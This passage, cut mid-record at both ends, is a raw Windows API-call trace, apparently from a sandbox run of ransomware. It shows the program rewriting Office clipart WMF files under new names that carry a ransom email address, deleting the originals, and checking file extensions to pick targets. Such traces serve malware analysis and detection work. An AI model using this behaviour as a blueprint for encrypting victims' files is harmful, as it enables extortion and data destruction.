(normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.133] GetLastError () returned 0x0 [0198.133] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x62e0, lpOverlapped=0x0) returned 1 [0198.135] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x62f0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x62f0, lpOverlapped=0x0) returned 1 [0198.136] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.136] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.136] SetEndOfFile (hFile=0x3a4) returned 1 [0198.137] CloseHandle (hObject=0x3a4) returned 1 [0198.137] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.137] SetEndOfFile (hFile=0x358) returned 1 [0198.138] CloseHandle (hObject=0x358) returned 1 [0198.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.138] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf")) returned 1 [0198.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF") returned 68 [0198.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF") returned 68 [0198.139] lstrlenW (lpString=".doc") returned 4 [0198.139] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.139] lstrlenW (lpString=".docx") returned 5 [0198.139] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0198.139] lstrlenW (lpString=".pdf") returned 4 [0198.139] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.139] lstrlenW (lpString=".xls") returned 4 [0198.139] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.139] lstrlenW (lpString=".xlsx") returned 5 [0198.139] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0198.139] lstrlenW (lpString=".ppt") returned 4 [0198.139] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF") returned 68 [0198.139] lstrlenW (lpString=".zip") returned 4 [0198.139] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.139] lstrlenW (lpString=".rar") returned 4 [0198.139] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.139] lstrlenW (lpString=".bz2") returned 4 [0198.139] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.139] lstrlenW (lpString=".7z") returned 3 [0198.139] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF") returned 68 [0198.139] lstrlenW (lpString=".dbf") returned 4 [0198.139] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF") returned 68 [0198.139] lstrlenW (lpString=".1cd") returned 4 [0198.139] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF") returned 68 [0198.140] lstrlenW (lpString=".jpg") returned 4 [0198.140] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.143] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.144] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.145] GetLastError () returned 0x0 [0198.145] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xe956, lpOverlapped=0x0) returned 1 [0198.148] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xe960, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xe960, lpOverlapped=0x0) returned 1 [0198.150] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.150] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.150] SetEndOfFile (hFile=0x3a4) returned 1 [0198.150] CloseHandle (hObject=0x3a4) returned 1 [0198.150] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.150] SetEndOfFile (hFile=0x358) returned 1 [0198.151] CloseHandle (hObject=0x358) returned 1 [0198.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.152] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf")) returned 1 [0198.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF") returned 68 [0198.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF") returned 68 [0198.152] lstrlenW (lpString=".doc") returned 4 [0198.152] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.153] lstrlenW (lpString=".docx") returned 5 [0198.153] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0198.153] lstrlenW (lpString=".pdf") returned 4 [0198.153] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.153] lstrlenW (lpString=".xls") returned 4 [0198.153] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.153] lstrlenW (lpString=".xlsx") returned 5 [0198.153] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0198.153] lstrlenW (lpString=".ppt") returned 4 [0198.153] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF") returned 68 [0198.153] lstrlenW (lpString=".zip") returned 4 [0198.153] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.153] lstrlenW (lpString=".rar") returned 4 [0198.153] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.153] lstrlenW (lpString=".bz2") returned 4 [0198.153] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.153] lstrlenW (lpString=".7z") returned 3 [0198.153] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF") returned 68 [0198.153] lstrlenW (lpString=".dbf") returned 4 [0198.153] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF") returned 68 [0198.153] lstrlenW (lpString=".1cd") returned 4 [0198.153] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF") returned 68 [0198.153] lstrlenW (lpString=".jpg") returned 4 [0198.153] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.154] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.154] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.155] GetLastError () returned 0x0 [0198.155] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x99a2, lpOverlapped=0x0) returned 1 [0198.475] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x99b0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x99b0, lpOverlapped=0x0) returned 1 [0198.477] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.477] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.477] SetEndOfFile (hFile=0x3a4) returned 1 [0198.477] CloseHandle (hObject=0x3a4) returned 1 [0198.477] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.477] SetEndOfFile (hFile=0x358) returned 1 [0198.478] CloseHandle (hObject=0x358) returned 1 [0198.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.478] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf")) returned 1 [0198.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF") returned 68 [0198.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF") returned 68 [0198.479] lstrlenW (lpString=".doc") returned 4 [0198.479] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.479] lstrlenW (lpString=".docx") returned 5 [0198.479] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0198.479] lstrlenW (lpString=".pdf") returned 4 [0198.479] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.479] lstrlenW (lpString=".xls") returned 4 [0198.479] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.479] lstrlenW (lpString=".xlsx") returned 5 [0198.479] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0198.479] lstrlenW (lpString=".ppt") returned 4 [0198.479] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF") returned 68 [0198.479] lstrlenW (lpString=".zip") returned 4 [0198.479] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.479] lstrlenW (lpString=".rar") returned 4 [0198.479] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.479] lstrlenW (lpString=".bz2") returned 4 [0198.479] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.479] lstrlenW (lpString=".7z") returned 3 [0198.479] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF") returned 68 [0198.480] lstrlenW (lpString=".dbf") returned 4 [0198.480] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF") returned 68 [0198.480] lstrlenW (lpString=".1cd") returned 4 [0198.480] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF") returned 68 [0198.480] lstrlenW (lpString=".jpg") returned 4 [0198.480] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.480] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.480] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.481] GetLastError () returned 0x0 [0198.481] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x4724, lpOverlapped=0x0) returned 1 [0198.483] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x4730, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x4730, lpOverlapped=0x0) returned 1 [0198.484] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.484] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.484] SetEndOfFile (hFile=0x3a4) returned 1 [0198.484] CloseHandle (hObject=0x3a4) returned 1 [0198.484] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.484] SetEndOfFile (hFile=0x358) returned 1 [0198.485] CloseHandle (hObject=0x358) returned 1 [0198.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf")) returned 1 [0198.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF") returned 68 [0198.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF") returned 68 [0198.486] lstrlenW (lpString=".doc") returned 4 [0198.486] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.486] lstrlenW (lpString=".docx") returned 5 [0198.486] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0198.486] lstrlenW (lpString=".pdf") returned 4 [0198.486] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.486] lstrlenW (lpString=".xls") returned 4 [0198.487] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.487] lstrlenW (lpString=".xlsx") returned 5 [0198.487] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0198.487] lstrlenW (lpString=".ppt") returned 4 [0198.487] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF") returned 68 [0198.487] lstrlenW (lpString=".zip") returned 4 [0198.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.487] lstrlenW (lpString=".rar") returned 4 [0198.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.487] lstrlenW (lpString=".bz2") returned 4 [0198.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.487] lstrlenW (lpString=".7z") returned 3 [0198.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF") returned 68 [0198.487] lstrlenW (lpString=".dbf") returned 4 [0198.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF") returned 68 [0198.487] lstrlenW (lpString=".1cd") returned 4 [0198.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF") returned 68 [0198.487] lstrlenW (lpString=".jpg") returned 4 [0198.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.488] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.488] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.489] GetLastError () returned 0x0 [0198.489] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x19c4, lpOverlapped=0x0) returned 1 [0198.498] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x19d0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x19d0, lpOverlapped=0x0) returned 1 [0198.500] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.500] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.500] SetEndOfFile (hFile=0x3a4) returned 1 [0198.500] CloseHandle (hObject=0x3a4) returned 1 [0198.500] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.500] SetEndOfFile (hFile=0x358) returned 1 [0198.501] CloseHandle (hObject=0x358) returned 1 [0198.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.501] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf")) returned 1 [0198.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF") returned 68 [0198.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF") returned 68 [0198.502] lstrlenW (lpString=".doc") returned 4 [0198.502] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.502] lstrlenW (lpString=".docx") returned 5 [0198.502] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0198.502] lstrlenW (lpString=".pdf") returned 4 [0198.502] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.502] lstrlenW (lpString=".xls") returned 4 [0198.502] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.502] lstrlenW (lpString=".xlsx") returned 5 [0198.502] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0198.502] lstrlenW (lpString=".ppt") returned 4 [0198.502] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF") returned 68 [0198.502] lstrlenW (lpString=".zip") returned 4 [0198.502] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.502] lstrlenW (lpString=".rar") returned 4 [0198.502] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.502] lstrlenW (lpString=".bz2") returned 4 [0198.502] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.502] lstrlenW (lpString=".7z") returned 3 [0198.502] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF") returned 68 [0198.502] lstrlenW (lpString=".dbf") returned 4 [0198.502] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF") returned 68 [0198.502] lstrlenW (lpString=".1cd") returned 4 [0198.502] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF") returned 68 [0198.502] lstrlenW (lpString=".jpg") returned 4 [0198.502] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.503] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.503] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0198.503] GetLastError () returned 0x0 [0198.503] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1500, lpOverlapped=0x0) returned 1 [0198.512] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1510, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1510, lpOverlapped=0x0) returned 1 [0198.513] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.513] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.513] SetEndOfFile (hFile=0x3a4) returned 1 [0198.514] CloseHandle (hObject=0x3a4) returned 1 [0198.514] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.514] SetEndOfFile (hFile=0x358) returned 1 [0198.514] CloseHandle (hObject=0x358) returned 1 [0198.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", 